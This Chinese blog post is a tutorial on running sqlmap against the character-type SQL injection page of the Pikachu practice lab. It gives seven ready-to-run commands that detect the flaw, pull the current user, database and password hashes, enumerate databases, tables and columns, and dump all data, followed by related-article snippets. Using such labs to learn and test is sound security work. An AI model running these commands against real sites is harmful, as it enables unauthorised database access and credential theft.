使用Sqlmap进行sql注入(pikachu字符型注入为例)

已于 2024-06-16 14:27:26 修改
阅读量414 收藏 3
点赞数 4
文章标签: sql 数据库
于 2024-06-16 14:24:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_48118301/article/details/139719253
版权

1、测试URL的get参数是否存在注入

--dbms:指定数据库类型

-v (1-5):输出信息等级

--batch:自动进行默认操作

格式:sqlmap -u "URL" --dbms mysql -v 1 --batch 

sqlmap -u "http://192.168.88.1:8086/pikachu/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql -v 1 --batch

2、获取敏感信息

--current-user:当前连接的用户

--current-db:当前连接的数据库

--is-dbs:是否root权限

--password:数据库的密码

格式:sqlmap -u “URL" --dbms mysql -v 1 --current-user --current-db --is-dba --passwords --batch

sqlmap -u "http://192.168.88.1:8086/pikachu/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql -v 1 --current-uesr --current-db --is-dba --passwords --batch

3、获取所有库名

-dbs :列出所有数据库

格式:sqlmap -u “URL" --dbms mysql -v 1 --dbs --batch

sqlmap -u "http://192.168.88.1:8086/pikachu/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql -v 1 --dbs --batch

4、获取表信息

-D:指定数据库

--tables:列出所有表

格式:sqlmap -u “URL" --dbms mysql -v 1 -D pikachu --tables --batch

sqlmap -u "http://192.168.88.1:8086/pikachu/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql -v 1 -D pikachu --tables --batch

5、获取某个表的字段信息

-T:指定表

--column:获取字段

格式:sqlmap -u “URL" --dbms mysql -v 1 -D pikachu -T users --columns --batch

sqlmap -u "http://192.168.88.1:8086/pikachu/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql -v 1 -D pikachu -T users  --columns --batch

6、获取某个库的所有表和字段

-tables:列出所有表

--columns:列出所有列

格式:sqlmap -u "URL" --dbms mysql -v 1 -D pikachu --tables  --columns --batch

sqlmap -u "http://192.168.88.1:8086/pikachu/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql -v 1 -D pikachu --tables  --columns --batch

7、获取所有数据

--dump:导出所有数据

格式:sqlmap -u "URL" --dbms mysql -v 1 -D pikachu --tables  --columns --dump  --batch

sqlmap -u "http://192.168.88.1:8086/pikachu/vul/sqli/sqli_str.php?name=1&submit=%E6%9F%A5%E8%AF%A2" --dbms mysql -v 1 -D pikachu --tables  --columns --dump  --batch

再也不在
关注
  • 4
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Sqlmappikachu的GET请求注入漏洞测试
weixin_62943062的博客
07-12 3291
Sqlmappikachu的GET请求注入漏洞测试
sqlmap sql 注入测试工具
03-06
SQLMap是一款强大的、自动化SQL注入测试工具,专为检测和利用SQL注入漏洞而设计。它可以帮助安全专家或IT从业者在不熟悉目标系统的情况下,轻松发现并利用潜在的SQL注入漏洞,确保系统的安全性。 1. SQL注入简介:...
pikachu靶场SQL,sqlmap解法
m0_62584974的博客
07-31 2451
相信大家都熟悉了pikachu靶场的手工注入方法和原理,但是对于盲注等一些复杂的注入,自己一个个试十分麻烦,此时我们就可以使用sqlmap进行注入,所以我整理了一些pikachu靶场的sqlmap解法,让新手更好地适应和熟练使用sqlmap这款十分好用的工具...............
Pikachu靶场——SQL注入漏洞
来日可期的博客
10-06 1768
SQL注入漏洞主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。
pikachu 字符SQL注入
m0_61903602的博客
10-25 637
pikachu 靶场 sql 字符
pikachu如何利用字符SQL注入拿下数据库
m0_61903602的博客
10-30 854
pikachu如何利用字符SQL注入拿下数据库
一、pikachuSQL注入(1)
qq_55202378的博客
08-21 462
SQL注入 pikachu
Pikachu-----Sql Inject(SQL注入
m0_65712192的博客
12-29 2567
Pikachu-----Sql Inject(SQL注入
Pikachu靶场通关笔记--Sql Inject(SQL注入)
weixin_45908624的博客
12-09 2914
sql注入
皮卡丘(pikachu)SQL注入(手工和工具举例)
weixin_44787832的博客
07-21 4142
我们以数字(使用sqlmap)和整数(使用手工注入)举一个例子 数字注入(POST) 我们使用sqlmap 选择1点击查询并抓包 将抓下来的数据全部复制在一个记事本里,命名为1.txt 使用命令 python sqlmap.py –r 111.txt –current-db 爆出数据库pikachu 之后爆破表:python sqlmap.py –r 111.txt –D pikachu -tables 爆出表 在之后找一个表去爆列名 python
java开发基于SQLmapSQL注入工具源码.zip
06-01
基于SQLmapSQL注入工具源码.。基于SQLmap使用Java开发 安装教程 安装JDK(需要有javafx) 安装Python 安装SQLmap 基于SQLmapSQL注入工具源码.。基于SQLmap使用Java开发 安装教程 安装JDK(需要有javafx)...
SqlMap-Sql注入
08-02
Sqlmap是开源的自动化SQL注入工具,由Python写成,具有如下特点: 完全支持MySQL、Oracle、PostgreSQL、Microsoft SQL Server、Microsoft Access、IBM DB2、SQLite、Firebird、Sybase、SAP MaxDB、HSQLDB和Informix...
使用sqlmap+burpsuite进行中级sql注入
06-01
使用sqlmap+burpsuite进行中级sql注入,亲测可行
sqlmap sql注入
08-22
1. **自动检测**:SQLMap能够自动识别是否存在SQL注入漏洞,通过对输入参数进行各种测试,如时间延迟注入、盲注、基于错误的注入等。 2. **枚举与信息收集**:一旦发现注入点,SQLMap可以枚举数据库的版本、表格名...
[高频 SQL 50 题(基础版)]第一千七百五十七题,可回收且低脂产品
最新发布
weixin_45201305的博客
07-10 59
low_fats 是枚举类,取值为以下两种 ('Y', 'N'),其中 'Y' 表示该产品是低脂产品,'N' 表示不是低脂产品。recyclable 是枚举类,取值为以下两种 ('Y', 'N'),其中 'Y' 表示该产品可回收,而 'N' 表示不可回收。没什么难度,作为基础题五十题的第一题练手,现在也开始陆续写一些SQL,作为记录,和leetcode一起,大家都加油。编写解决方案找出既是低脂又是可回收的产品编号。是该表的主键(具有唯一值的列)。
Sql 导入到 Excel 工具
weixin_43891945的博客
07-09 177
VBA sql into Excel
SQL Server设置端口:跨平台指南
招风的黑耳CSDN
07-09 374
使用SQL Server时,设置或修改其监听的端口是确保数据库服务安全访问和高效管理的重要步骤。由于SQL Server可以部署在多种操作系统上,包括Windows、Linux和Docker容器等,因此设置端口的步骤和方法也会因平台而异。本文将为您提供一个跨平台的指南,帮助您在不同环境下设置SQL Server的端口。
SQL】索引过多的缺点
hui_zai_的博客
07-04 403
索引过多的缺点
sqlmap pikachu
08-17
根据引用和的描述,使用sqlmap工具进行注入测试时,可以通过以下命令获取数据库名称和版本: sqlmap -u "准备注入的URL" --current-db 在进行下一步时,当遇到【Y/n】时,可以输入Y继续执行。 基于Windows系统,并选择盲注(base on boolian)的方式,可以使用以下命令获取有关pikachu数据库的信息: pikachu--SQL-Inject 请注意,这只是一个示例命令,实际情况中需要根据具体的注入测试情况进行相应的调整和配置。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* *3* [通过SqlMappikachu平台进行注入](https://blog.csdn.net/weixin_52347768/article/details/121525695)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 100%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值